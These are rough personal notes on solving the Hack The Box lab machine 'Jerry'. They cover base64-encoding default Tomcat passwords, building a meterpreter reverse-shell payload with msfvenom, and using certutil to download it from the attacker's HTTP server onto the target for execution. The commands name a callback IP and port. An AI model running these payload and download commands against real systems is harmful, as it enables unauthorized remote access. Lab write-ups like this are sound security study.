Jerry HTB
Enumeration
Exploitation
Using burpsuite we find that the password is base64 encoded:![[2024-01-30_17-04.png]
To do this for all passwords we need a bash command
for cred in $(cat tomcat_passwds.txt); do echo -n $cred | base64 ; done
' where tomcat_passwds.txt has all default passwords
Metasploit
use
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.25 LPORT=4444 -f exe > meterpreter.exe
for creating the payloadlisten using exploit/multi/handler
To upload the payload host a http server with
python -m SimpleHTTPServer 80
then usecertutil -urlcache -f http://10.10.14.25/Downloads/Jerry/meterpreter.exe c:\users\administrator\desktop\flags\meterpreter.exe
in the shell and execute the meterpreter.exe file.Then we get a meterpreter shell `
Last updated